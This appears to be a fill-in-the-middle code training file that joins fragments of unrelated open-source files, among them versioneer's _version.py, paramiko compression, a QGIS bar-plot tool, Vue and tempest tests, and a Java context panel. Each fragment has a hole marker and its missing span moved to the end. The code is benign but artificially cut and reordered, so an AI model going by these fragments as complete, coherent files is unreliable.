g: "dd/MM/yyyy HH:mm",
G: "dd/MM/yyyy HH:mm:ss",
m: "dd MMMM",
M: "dd MMMM",
s: "yyyy'-'MM'-'dd'T'HH':'mm':'ss",
t: "HH:mm",
T: "HH:mm:ss",
u: "yyyy'-'MM'-'dd HH':'mm':'ss'Z'",
y: "MMMM yyyy",
Y: "MMMM yyyy"
},
"/": "/",
":": ":",
firstDay: 0
}
}
}
})(this);
return window.kendo;
}, typeof define == 'function' && define.amd ? define : function(_, f){ f(); });<|fim▁end|>
|
currency: {
|
<|file_name|>compress.py<|end_file_name|><|fim▁begin|># Copyright (C) 2003-2007 Robey Pointer <[email protected]>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,<|fim▁hole|>"""
import zlib
class ZlibCompressor (object):
def __init__(self):
self.z = zlib.compressobj(9)
def __call__(self, data):
return self.z.compress(data) + self.z.flush(zlib.Z_FULL_FLUSH)
class ZlibDecompressor (object):
def __init__(self):
self.z = zlib.decompressobj()
def __call__(self, data):
return self.z.decompress(data)<|fim▁end|>
|
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Compression implementations for a Transport.
|
<|file_name|>product.socket.js<|end_file_name|><|fim▁begin|>"use strict";
/**<|fim▁hole|>// Model events to emit
var events = ['save', 'remove'];
function register(socket) {
// Bind model events to socket events
for (var i = 0, eventsLength = events.length; i < eventsLength; i++) {
var event = events[i];
var listener = createListener('product:' + event, socket);
product_events_1.default.on(event, listener);
socket.on('disconnect', removeListener(event, listener));
}
}
exports.register = register;
function createListener(event, socket) {
return function (doc) {
socket.emit(event, doc);
};
}
function removeListener(event, listener) {
return function () {
product_events_1.default.removeListener(event, listener);
};
}
//# sourceMappingURL=product.socket.js.map<|fim▁end|>
|
* Broadcast updates to client when the model changes
*/
Object.defineProperty(exports, "__esModule", { value: true });
var product_events_1 = require("./product.events");
|
<|file_name|>_version.py<|end_file_name|><|fim▁begin|># This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = ""
cfg.tag_prefix = ""
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "datapoint/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:<|fim▁hole|> e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}<|fim▁end|>
| |
<|file_name|>BarPlot.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""
***************************************************************************
BarPlot.py
---------------------
Date : January 2013
Copyright : (C) 2013 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'January 2013'
__copyright__ = '(C) 2013, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import matplotlib.pyplot as plt
import matplotlib.pylab as lab
import numpy as np
from processing.core.parameters import ParameterTable
from processing.core.parameters import ParameterTableField
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.outputs import OutputHTML
from processing.tools import vector
from processing.tools import dataobjects
<|fim▁hole|> OUTPUT = 'OUTPUT'
NAME_FIELD = 'NAME_FIELD'
VALUE_FIELD = 'VALUE_FIELD'
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Bar plot')
self.group, self.i18n_group = self.trAlgorithm('Graphics')
self.addParameter(ParameterTable(self.INPUT, self.tr('Input table')))
self.addParameter(ParameterTableField(self.NAME_FIELD,
self.tr('Category name field'),
self.INPUT,
ParameterTableField.DATA_TYPE_NUMBER))
self.addParameter(ParameterTableField(self.VALUE_FIELD,
self.tr('Value field'),
self.INPUT,
ParameterTableField.DATA_TYPE_NUMBER))
self.addOutput(OutputHTML(self.OUTPUT, self.tr('Bar plot')))
def processAlgorithm(self, progress):
layer = dataobjects.getObjectFromUri(
self.getParameterValue(self.INPUT))
namefieldname = self.getParameterValue(self.NAME_FIELD)
valuefieldname = self.getParameterValue(self.VALUE_FIELD)
output = self.getOutputValue(self.OUTPUT)
values = vector.values(layer, namefieldname, valuefieldname)
plt.close()
ind = np.arange(len(values[namefieldname]))
width = 0.8
plt.bar(ind, values[valuefieldname], width, color='r')
plt.xticks(ind, values[namefieldname], rotation=45)
plotFilename = output + '.png'
lab.savefig(plotFilename)
with open(output, 'w') as f:
f.write('<html><img src="' + plotFilename + '"/></html>')<|fim▁end|>
|
class BarPlot(GeoAlgorithm):
INPUT = 'INPUT'
|
<|file_name|>Row.spec.ts<|end_file_name|><|fim▁begin|>import Row from '../Row'
import {
mount,
Wrapper,
MountOptions,
} from '@vue/test-utils'
import Vue from 'vue'
describe('Table Row', () => {
type Instance = InstanceType<typeof Row>
let mountFunction: (options?: MountOptions<Instance>) => Wrapper<Instance>
beforeEach(() => {
mountFunction = (options?: MountOptions<Instance>) => {
return mount(Row, options)
}
})
it('should render without slots', () => {
const wrapper = mountFunction({
context: {
props: {
headers: [
{ text: 'Petrol', value: 'petrol' },
{ text: 'Diesel', value: 'diesel' },
],
item: {
petrol: 0.68,
diesel: 0.65,
},
},
},
})
expect(wrapper.findAll('tr')).toHaveLength(1)
expect(wrapper.findAll('td')).toHaveLength(2)
expect(wrapper.html()).toMatchSnapshot()
})
it('should render non-string values', () => {
const wrapper = mountFunction({
context: {
props: {
headers: [
{ value: 'string' },
{ value: 'number' },
{ value: 'array' },
{ value: 'boolean' },
{ value: 'object' },
{ value: 'undefined' },
{ value: 'null' },
],
item: {
string: 'string',
number: 12.34,
array: [1, 2],
boolean: false,
object: { foo: 'bar' },
null: null,
},
},
},
})
expect(wrapper.html()).toMatchSnapshot()
})
it('should render with cellClass', () => {
const wrapper = mountFunction({
context: {
props: {
headers: [
{ text: 'Petrol', value: 'petrol', cellClass: 'a' },
{ text: 'Diesel', value: 'diesel', cellClass: ['b', 'c'] },
],
item: {
petrol: 0.68,
diesel: 0.65,
},
},
},
})
const tds = wrapper.findAll('td')
expect(tds.at(0).classes()).toContain('a')
expect(tds.at(1).classes()).toContain('b')
expect(tds.at(1).classes()).toContain('c')
expect(wrapper.html()).toMatchSnapshot()
})
it.skip('should render with regular slots', () => {
const wrapper = mountFunction({
context: {
props: {
headers: [
{ text: 'Petrol', value: 'petrol' },
{ text: 'Diesel', value: 'diesel' },
],
},
},
slots: {
'column.petrol': '<p class="test">$0.68</p>',
'column.diesel': '<p class="test">$0.65</p>',
},
})
expect(wrapper.findAll('tr')).toHaveLength(1)
expect(wrapper.findAll('td')).toHaveLength(2)
expect(wrapper.findAll('p.test')).toHaveLength(2)
expect(wrapper.html()).toMatchSnapshot()
})
it.skip('should render with scoped slots', () => {
const vm = new Vue()
const wrapper = mountFunction({
context: {
props: {
headers: [
{ text: 'Petrol', value: 'petrol' },
{ text: 'Diesel', value: 'diesel' },
],
item: {
petrol: 0.68,
diesel: 0.65,
},
},
},
scopedSlots: {
'column.petrol': props => vm.$createElement('p', { staticClass: `test ${props.header.value}` }, [props.value]),
'column.diesel': props => vm.$createElement('p', { staticClass: `test ${props.header.value}` }, [props.value]),
},<|fim▁hole|> expect(wrapper.findAll('p.test')).toHaveLength(2)
expect(wrapper.html()).toMatchSnapshot()
})
})<|fim▁end|>
|
})
expect(wrapper.findAll('tr')).toHaveLength(1)
expect(wrapper.findAll('td')).toHaveLength(2)
|
<|file_name|>AudioObjectBasicInfoContent.java<|end_file_name|><|fim▁begin|>/*
* aTunes
* Copyright (C) Alex Aranda, Sylvain Gaudard and contributors
*
* See http://www.atunes.org/wiki/index.php?title=Contributing for information about contributors
*
* http://www.atunes.org
* http://sourceforge.net/projects/atunes
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
package net.sourceforge.atunes.kernel.modules.context.audioobject;
import java.awt.Component;
import java.awt.GridBagConstraints;
import java.awt.GridBagLayout;
import java.awt.Insets;
import java.util.ArrayList;
import java.util.List;
import javax.swing.AbstractAction;
import javax.swing.ImageIcon;
import javax.swing.JLabel;
import javax.swing.JMenuItem;
import javax.swing.JPanel;
import javax.swing.SwingConstants;
import net.sourceforge.atunes.kernel.modules.context.AbstractContextPanelContent;
import net.sourceforge.atunes.model.ILocalAudioObject;
import net.sourceforge.atunes.model.IStateContext;
import net.sourceforge.atunes.utils.I18nUtils;
/**
* Basic information about an audio object
* @author alex
*
*/
public class AudioObjectBasicInfoContent extends AbstractContextPanelContent<AudioObjectBasicInfoDataSource> {
private static final long serialVersionUID = 996227362636450601L;
/**
* Image for Audio Object
*/
private JLabel audioObjectImage;
/**
* Title of audio object
*/
private JLabel audioObjectTitle;
/**
* Artist of audio object
*/
private JLabel audioObjectArtist;
/**
* Last date played this audio object
*/
private JLabel audioObjectLastPlayDate;
private IStateContext stateContext;
private AbstractAction addLovedSongInLastFMAction;
private AbstractAction addBannedSongInLastFMAction;
<|fim▁hole|> * @param addBannedSongInLastFMAction
*/
public void setAddBannedSongInLastFMAction(AbstractAction addBannedSongInLastFMAction) {
this.addBannedSongInLastFMAction = addBannedSongInLastFMAction;
}
/**
* @param addLovedSongInLastFMAction
*/
public void setAddLovedSongInLastFMAction(AbstractAction addLovedSongInLastFMAction) {
this.addLovedSongInLastFMAction = addLovedSongInLastFMAction;
}
/**
* @param stateContext
*/
public void setStateContext(IStateContext stateContext) {
this.stateContext = stateContext;
}
@Override
public void clearContextPanelContent() {
super.clearContextPanelContent();
audioObjectImage.setIcon(null);
audioObjectImage.setBorder(null);
audioObjectTitle.setText(null);
audioObjectArtist.setText(null);
audioObjectLastPlayDate.setText(null);
addLovedSongInLastFMAction.setEnabled(false);
addBannedSongInLastFMAction.setEnabled(false);
}
@Override
public void updateContentFromDataSource(AudioObjectBasicInfoDataSource source) {
ImageIcon image = source.getImage();
if (image != null) {
audioObjectImage.setIcon(image);
}
audioObjectTitle.setText(source.getTitle());
audioObjectArtist.setText(source.getArtist());
audioObjectLastPlayDate.setText(source.getLastPlayDate());
// TODO: Allow these options for radios where song information is available
addLovedSongInLastFMAction.setEnabled(stateContext.isLastFmEnabled() && source.getAudioObject() instanceof ILocalAudioObject);
addBannedSongInLastFMAction.setEnabled(stateContext.isLastFmEnabled() && source.getAudioObject() instanceof ILocalAudioObject);
}
@Override
public String getContentName() {
return I18nUtils.getString("INFO");
}
@Override
public Component getComponent() {
// Create components
audioObjectImage = new JLabel();
audioObjectTitle = new JLabel();
audioObjectTitle.setHorizontalAlignment(SwingConstants.CENTER);
audioObjectTitle.setFont(getLookAndFeelManager().getCurrentLookAndFeel().getContextInformationBigFont());
audioObjectArtist = new JLabel();
audioObjectArtist.setHorizontalAlignment(SwingConstants.CENTER);
audioObjectLastPlayDate = new JLabel();
audioObjectLastPlayDate.setHorizontalAlignment(SwingConstants.CENTER);
// Add components
JPanel panel = new JPanel(new GridBagLayout());
GridBagConstraints c = new GridBagConstraints();
c.gridx = 0;
c.gridy = 0;
c.insets = new Insets(15, 0, 0, 0);
panel.add(audioObjectImage, c);
c.gridx = 0;
c.gridy = 1;
c.weightx = 1;
c.weighty = 0;
c.fill = GridBagConstraints.HORIZONTAL;
c.insets = new Insets(5, 10, 0, 10);
panel.add(audioObjectTitle, c);
c.gridy = 2;
c.insets = new Insets(5, 10, 10, 10);
panel.add(audioObjectArtist, c);
c.gridy = 3;
panel.add(audioObjectLastPlayDate, c);
return panel;
}
@Override
public List<Component> getOptions() {
List<Component> options = new ArrayList<Component>();
options.add(new JMenuItem(addLovedSongInLastFMAction));
options.add(new JMenuItem(addBannedSongInLastFMAction));
return options;
}
}<|fim▁end|>
|
/**
|
<|file_name|>test_share_servers_negative.py<|end_file_name|><|fim▁begin|># Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils # noqa
from tempest_lib import exceptions as lib_exc # noqa
from tempest.api.share import base
from tempest import clients_share as clients
from tempest import test
class ShareServersNegativeAdminTest(base.BaseSharesAdminTest):
@classmethod
def resource_setup(cls):
super(ShareServersNegativeAdminTest, cls).resource_setup()
cls.member_shares_client = clients.Manager().shares_client
@test.attr(type=["gate", "smoke", "negative", ])
def test_try_list_share_servers_with_member(self):
self.assertRaises(lib_exc.Forbidden,
self.member_shares_client.list_share_servers)
@test.attr(type=["gate", "smoke", "negative", ])
def test_try_show_share_server_with_member(self):
self.assertRaises(lib_exc.Forbidden,
self.member_shares_client.show_share_server,
'fake_id')
@test.attr(type=["gate", "smoke", "negative", ])
def test_try_show_share_server_details_with_member(self):
self.assertRaises(lib_exc.Forbidden,
self.member_shares_client.show_share_server_details,
'fake_id')
@test.attr(type=["gate", "smoke", "negative", ])
def test_show_share_server_with_inexistent_id(self):
self.assertRaises(lib_exc.NotFound,
self.shares_client.show_share_server,
'fake_id')
@test.attr(type=["gate", "smoke", "negative", ])
def test_show_share_server_details_with_inexistent_id(self):
self.assertRaises(lib_exc.NotFound,
self.shares_client.show_share_server_details,
'fake_id')
@test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_wrong_filter_key(self):<|fim▁hole|> @test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_wrong_filter_value(self):
search_opts = {'host': 123}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
@test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_fake_status(self):
search_opts = {"status": data_utils.rand_name("fake_status")}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
@test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_fake_host(self):
search_opts = {"host": data_utils.rand_name("fake_host")}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
@test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_fake_project(self):
search_opts = {"project_id": data_utils.rand_name("fake_project_id")}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
@test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_fake_share_network(self):
search_opts = {
"share_network": data_utils.rand_name("fake_share_network"),
}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
@test.attr(type=["gate", "smoke", "negative", ])
def test_delete_share_server_with_nonexistent_id(self):
self.assertRaises(lib_exc.NotFound,
self.shares_client.delete_share_server,
"fake_nonexistent_share_server_id")
@test.attr(type=["gate", "smoke", "negative", ])
def test_delete_share_server_with_member(self):
self.assertRaises(lib_exc.Forbidden,
self.member_shares_client.delete_share_server,
"fake_nonexistent_share_server_id")<|fim▁end|>
|
search_opts = {'fake_filter_key': 'ACTIVE'}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
|
<|file_name|>test_uptime.py<|end_file_name|><|fim▁begin|>import unittest
try:
from unittest import mock
except ImportError:
import mock
from pi3bar.plugins.uptime import get_uptime_seconds, uptime_format, Uptime
class GetUptimeSecondsTestCase(unittest.TestCase):
def test(self):<|fim▁hole|> m.return_value.readline.return_value = '5' # py33
with mock.patch('pi3bar.plugins.uptime.open', m, create=True):
seconds = get_uptime_seconds()
self.assertEqual(5, seconds)
class UptimeFormatTestCase(unittest.TestCase):
def test_seconds(self):
s = uptime_format(5)
self.assertEqual('0:00:00:05', s)
def test_minutes(self):
s = uptime_format(3540)
self.assertEqual('0:00:59:00', s)
def test_hours(self):
s = uptime_format(49020)
self.assertEqual('0:13:37:00', s)
def test_days(self):
s = uptime_format(135420)
self.assertEqual('1:13:37:00', s)
def test_format_days_applied_to_hours(self):
s = uptime_format(135420, '%H:%M:%S')
self.assertEqual('37:37:00', s)
def test_format_hours_applied_to_minutes(self):
s = uptime_format(49020, '%M:%S')
self.assertEqual('817:00', s)
